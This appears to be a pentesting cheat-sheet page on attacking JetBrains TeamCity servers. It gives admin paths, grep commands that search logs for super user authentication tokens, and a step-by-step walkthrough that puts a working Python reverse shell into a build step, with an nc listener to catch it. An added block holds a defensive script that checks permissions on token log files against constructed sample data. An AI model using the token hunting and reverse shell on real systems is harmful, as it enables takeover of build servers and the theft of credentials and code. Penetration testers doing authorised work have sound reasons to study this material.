Exploit Notes

TeamCity Pentesting

Last modified: 2022-12-25

TeamCity is a build management and continuous integration server from JetBrains.

Common Directories

/admin
/admin/admin.html

Find Super User Authentication Tokens

If we find a super user authentication token, we can log in as the super user with it. The commands below search the TeamCity logs for one.

grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs
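
A defender-side check for the exposure described above, as an added example that is not part of the original page: it lists log files that contain the super user token line and are readable by accounts other than the file owner. The file names, log lines and token values are constructed for the demo, and the function names are hypothetical.

```shell
#!/bin/sh
# Added defensive example (not from the original page).
PATTERN='super user authentication token'

# audit_token_logs DIR: print "<exposure>: <path>" for every file under DIR
# that contains the token line and is readable beyond its owner.
audit_token_logs() {
    # -perm -004: the "other" read bit is set.
    find "$1" -type f -perm -004 \
        -exec grep -il "$PATTERN" {} + 2>/dev/null |
        sed 's/^/world-readable: /' || true
    # -perm -040 without -004: readable by the owning group only.
    find "$1" -type f -perm -040 ! -perm -004 \
        -exec grep -il "$PATTERN" {} + 2>/dev/null |
        sed 's/^/group-readable: /' || true
    return 0
}

# count_findings DIR: number of exposed files.
count_findings() {
    audit_token_logs "$1" | wc -l | tr -d ' '
}

# make_sample_logs: build a constructed logs directory and print its path.
# File names, log lines and token values are made up for the demo.
make_sample_logs() {
    d=$(mktemp -d)
    printf '%s\n' 'INFO - Super user authentication token: 0000000000000000000' \
        > "$d/teamcity-server.log"
    printf '%s\n' 'INFO - super user authentication token: 1111111111111111111' \
        > "$d/teamcity-server.log.1"
    printf '%s\n' 'INFO - Super user authentication token: 2222222222222222222' \
        > "$d/owner-only.log"
    printf '%s\n' 'INFO - Server startup complete' > "$d/other.log"
    chmod 644 "$d/teamcity-server.log" "$d/other.log"
    chmod 640 "$d/teamcity-server.log.1"
    chmod 600 "$d/owner-only.log"
    printf '%s\n' "$d"
}

# Demo run on the constructed directory.
demo_dir=$(make_sample_logs)
audit_token_logs "$demo_dir"
rm -rf "$demo_dir"
```

The check looks at file mode bits only, so restrictive permissions on a parent directory may already limit access to a listed file.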

Reverse Shell

  1. Log in as the super user.

  2. Create a new project in the admin dashboard.

  3. Click the "Manual" tab and fill in the required fields.

  4. A new project is created.

  5. In the project home, create a Build Configuration.

  6. On the build configuration page, click "Build Steps" in the left menu.

  7. Add a build step.

  8. Select "Command Line" as the Runner type.

  9. Put a Python reverse shell script in the "Custom script" field.

    export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
    
  10. Start a listener on the local machine.

    nc -lvnp 4444
    
  11. Click the "Run" button on the build page.

  12. We should get a shell in the terminal.
